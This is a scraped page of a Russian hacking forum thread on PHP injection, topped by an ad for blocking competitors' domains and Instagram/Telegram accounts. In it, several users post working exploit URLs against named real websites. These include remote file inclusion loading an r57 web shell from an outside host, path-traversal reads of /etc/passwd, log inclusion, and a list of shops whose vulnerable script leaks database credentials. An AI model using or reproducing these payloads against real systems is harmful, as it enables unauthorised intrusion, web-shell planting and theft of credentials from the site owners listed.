УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
PHP Иньекции

Страница 60 из 116

« Первая

110

Последняя »

Опции темы

Поиск в этой теме

Опции просмотра

#591

16.01.2008, 19:20

Tigger

Познавший АНТИЧАТ

Регистрация: 27.08.2007

Сообщений: 1,107

Провел на форуме:
5386281

Репутация: 1177

Отправить сообщение для Tigger с помощью ICQ

http://www.zsk-gazprom.ru/gallery/update/update5.php?lang=[url]
шелл должен быть на сервере, который не поддерживает php...например www.nm.ru
и в конце ссылки .php не писать...
Значит зпрос будет такой: http://www.zsk-gazprom.ru/gallery/update/update5.php?lang=http://www.site.nm.ru/r57shell

---------------------------------------------------------------

Grey: нда поразительный инклуд, точнее изврат поражает, зачем заливать хрен знает куда шелл без расширения?

Заливаем куда угодно шелл с любым расширением, к примеру txt.

А дальше:

Код:

http://www.zsk-gazprom.ru/gallery/update/update5.php?lang=http://www.site.ru/shell.txt?

Со знаком вопроса на конце.

Последний раз редактировалось Grey; 16.01.2008 в 19:31..

#592

16.01.2008, 21:34

~~iddqd~~

Banned

Регистрация: 19.12.2007

Сообщений: 924

Провел на форуме:
4192567

Репутация: 2145

Клубничка...
http://www.wannawatch.com/hosted/index.php?wm_login=tcg4free&cf=y&sub=&site=mrbigdi ckshotchicks_mov205&page=../../../../../../../etc/passwd

#593

17.01.2008, 02:33

Spyder

Members of Antichat - Level 5

Регистрация: 09.10.2006

Сообщений: 1,698

Провел на форуме:
9098076

Репутация: 4303

http://www.minprom.bashkortostan.ru/_sfera.php?link=[url]
Министерство промышленности, инвестиционной и инновационной политики Республики Башкортостан

может баян, хз

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

#594

18.01.2008, 21:37

~~ХаЬа~~

Banned

Регистрация: 18.01.2008

Сообщений: 6

Провел на форуме:
29103

Репутация: 25

Код:

http://www.ssga.ru/lidar/index.php?flag=14&file=../../../../../../../../../../../../../../../../../../../etc/passwd

Shop-Script 1.0

#595

19.01.2008, 01:58

~~iddqd~~

Banned

Регистрация: 19.12.2007

Сообщений: 924

Провел на форуме:
4192567

Репутация: 2145

Shop-Script 1.0

Когда-то нагуглил несколько уязвимых шопов, хз какие еще актуальны- кому не лень, проверьте:

3000.com.ua
dinaris.dp.ua
dmcoins.ru
gokom.ru
lidashoes.ru
philatelist.ru
pokupka.net.ua
rosspen.ru
smolotka.kiev.ua
tetramet.ru
vastudio.ru
velomot.com
vitlen.com.ua
vliga.irkutsk.ru
x-group.kiev.ua

Уязвимый скрипт с параметром:
/index.php?aux_page=../cfg/connect.inc.php
В исходнике страницы выводит настройки подключения к mysql

#596

19.01.2008, 11:25

The_HuliGun

Участник форума

Регистрация: 19.05.2007

Сообщений: 228

Провел на форуме:
4325663

Репутация: 240

Отправить сообщение для The_HuliGun с помощью ICQ

Боевой пример инклуда логов:

Код:

http://www.tcnj.edu/~acm/digitalfortress/?id=../../../../../../../../../../local/apps/packages/apache-2.0.59/logs/access_log%00

#597

23.01.2008, 21:56

frigid20

Новичок

Регистрация: 19.01.2008

Сообщений: 19

Провел на форуме:
71644

Репутация: 11

Код:

http://www.physics.wustl.edu/Fac/facDisplayPopUp.php?name=../../../../../../etc/passwd

#598

29.01.2008, 12:22

satana8920

Moderator - Level 7

Регистрация: 22.09.2006

Сообщений: 531

Провел на форуме:
3818187

Репутация: 369

Отправить сообщение для satana8920 с помощью ICQ

а вот от меня коллекция!!!
http://www.francismontagnet.com/site.php?page=[INCLUDE]&contentTag=TSS-video.html - UNIX
http://eugeneciurana.com/site.php?page=[INCLUDE]&contentTag=TSS-video.html - UNIX
http://www.sql-articles.com/index.php?page=[INCLUDE] - UNIX
http://www.speedcalibrator.com/template.php3?page=[INCLUDE] - UNIX
http://www.motophoto.com/content_demo/window.php3?section=11&page=[INCLUDE] - UNIX
http://www.izetit.de/index_projekte.php?page=[INCLUDE] - UNIX
http://www.timetech.de/index.php?page=[INCLUDE] - UNIX
http://www.autocad-magazin.de/index.php3?page=[INCLUDE]&naechster=10230 - UNIX
http://www.tux-saar.de/pages/main.php3?page=[INCLUDE] - UNIX
http://tangerinos.free.fr/photos/index.php3?page=[INCLUDE]&categories=03_Ecoles-Colegios&galeries=01_Ecole%20Berchet&ppp=12 - UNIX
http://www.planetemulator.free.fr/galeries/index.php3?page=[INCLUDE]&categories=Stars%20du%20X&galeries=Clara%20Morgan e&ppp=12 - UNIX
http://clubrandocar.free.fr/kdpics/index.php3?page=[INCLUDE]&categories=Randocar&galeries=Randocar%20a%20vendr e&ppp=12 - UNIX
http://www.serviceformulaire.fr/html/menu.phtml?page=[INCLUDE] - WIN
Юзайте на здоровье

Последний раз редактировалось satana8920; 29.01.2008 в 12:43..

#599

11.02.2008, 12:50

satana8920

Moderator - Level 7

Регистрация: 22.09.2006

Сообщений: 531

Провел на форуме:
3818187

Репутация: 369

два инклуда интересненьких

Код HTML:

http://www.longislandhshockey.net/cgi-bin/anyboard.cgi?fvp=/forum&cmd=retr&vf=Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA%3D%3D

Код HTML:

http://www.stylishfetish.com/cgi-bin/anyboard.cgi/board/forum/-=ab=-/index.html?cmd=retr&vf=Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA%3D%3D

Последний раз редактировалось satana8920; 11.02.2008 в 12:57..

#600

13.02.2008, 09:16

~~it's my~~

Banned

Регистрация: 29.09.2007

Сообщений: 512

Провел на форуме:
4038468

Репутация: 1224

Отправить сообщение для it's my с помощью ICQ

Код:

http://www.gentek.co.kr/index.php?option=com_board&bbs_id=notice&Itemid=99999999&requiredfile=../../../../../../../../../../../../etc/passwd
http://eng.pharmaceutical.co.kr/index.php?option=com_board&bbs_id=notice&Itemid=99999999&requiredfile=../../../../../../../../../../../../etc/passwd
http://gentech.ibuilder.co.kr/index.php?option=com_board&bbs_id=notice&Itemid=99999999&requiredfile=../../../../../../../../../../../../etc/passwd

Страница 60 из 116

« Первая

110

Последняя »

« Предыдущая тема | Следующая тема »

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход